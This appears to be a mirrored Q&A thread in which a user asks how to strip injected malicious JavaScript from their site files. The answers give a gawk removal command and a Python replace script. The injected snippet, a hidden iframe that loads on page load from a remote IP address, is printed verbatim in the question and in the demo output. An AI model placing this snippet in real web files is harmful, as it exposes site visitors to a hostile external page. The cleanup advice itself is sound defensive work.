可以将文章内容翻译成中文,广告屏蔽插件可能会导致该功能失效(如失效，请关闭广告屏蔽插件后再试):

问题:

My JS files have got this malicious code which I want to get rid of. So files have multiple occurances of it. Cananyone help use SED or AWK to remove it ?

if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}

回答1:

Save just that code segment in a file named "bad" and then run this on your infected files (uses GNU awk for multi-char RS):

awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected

Once you're happy it's behaving as expected after testing on 1 infected file, you can add the inplace editing flag (again gawk-only) and run it on all of your infected files at once:

awk -i inplace -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); print; next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected1 infected2 ... infectedN

wrt your command below that "it didn't work", look at it working:

$ cat bad
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}

$ cat infected
foo
if (typeof window.jsuekzis == 'undefined') {
window.jsuekzis = 1;
window.onload = function() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "none";
    iframe.src = "http://155.94.75.92/iframe.html";
    document.body.appendChild(iframe);
};

}
bar

$ awk -v RS='^$' -v ORS= '
NR==FNR { bad=$0; lgth=length(bad); next }
s = index($0,bad) { $0 = substr($0,1,s-1) substr($0,s+lgth) }
{ print }
' bad infected
foo
bar

回答2:

I would suggest using a Python script:

list_of_js_file_paths = ["/path/to/file/1","/path/to/file/2"]

for i in list_of_js_file_paths:
    original = ""
    with open(i,"r") as file:
        original = file.read()
    original = original.replace("""
    <malicious_code>
    ""","")
    with open(i,"w") as file:
        file.write(original)

Now run it via sudo python3 yourpythonfile.py